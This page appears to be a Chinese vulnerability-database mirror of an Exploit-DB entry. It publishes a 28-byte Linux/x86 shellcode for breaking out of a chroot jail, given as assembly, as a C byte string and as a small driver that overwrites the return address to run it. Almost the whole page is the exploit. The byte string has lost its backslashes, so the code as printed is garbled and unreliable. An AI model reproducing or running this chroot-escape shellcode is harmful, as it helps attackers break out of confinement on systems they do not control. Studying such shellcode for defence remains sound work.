Linux/x86 – Break chroot (../ 10x Loop) Shellcode (28 bytes)

Linux/x86 – Break chroot (../ 10x Loop) Shellcode (28 bytes)

漏洞ID 1054603 漏洞类型
发布时间 2004-09-12 更新时间 2004-09-12
图片[1]-Linux/x86 – Break chroot (../ 10x Loop) Shellcode (28 bytes)-安全小百科CVE编号 N/A
图片[2]-Linux/x86 – Break chroot (../ 10x Loop) Shellcode (28 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13452
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/* The chroot() shellcode. It is the one of the smallest shellcodes
   in the !!world!!
   it will put '../' 10 times
   Size  28 bytes
   OS	 Linux
  		/rootteam/dev0id	(rootteam.void.ru)
			[email protected] 

BITS	32
main:
	xor	ecx,ecx
	xor	eax,eax
	push	ecx
	mov	cl,30
main_push:
	push byte 0x2e
	loop	main_push
	mov	cl,30
main_inc:
	dec	cl
	inc byte [esp+ecx]
	dec	cl
	loop	main_inc
	mov	ebx,esp
	mov	al,61
	int	0x80


*/

char shellcode[] =
	"x31xc9x31xc0x51xb1x1ex6ax2exe2xfcxb1x1exfexc9"
	"xfex04x0cxfexc9xe2xf7x89xe3xb0x3dxcdx80";
int
main(void)
{
	int *ret;
	ret = (int*)&ret + 2;
	(*ret) = shellcode;
}

相关推荐: PortailPHP mod_search/index.php跨站脚本(XSS)漏洞

PortailPHP mod_search/index.php跨站脚本(XSS)漏洞 漏洞ID 1203282 漏洞类型 跨站脚本 发布时间 2002-12-31 更新时间 2002-12-31 CVE编号 CVE-2002-2278 CNNVD-ID CNN…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享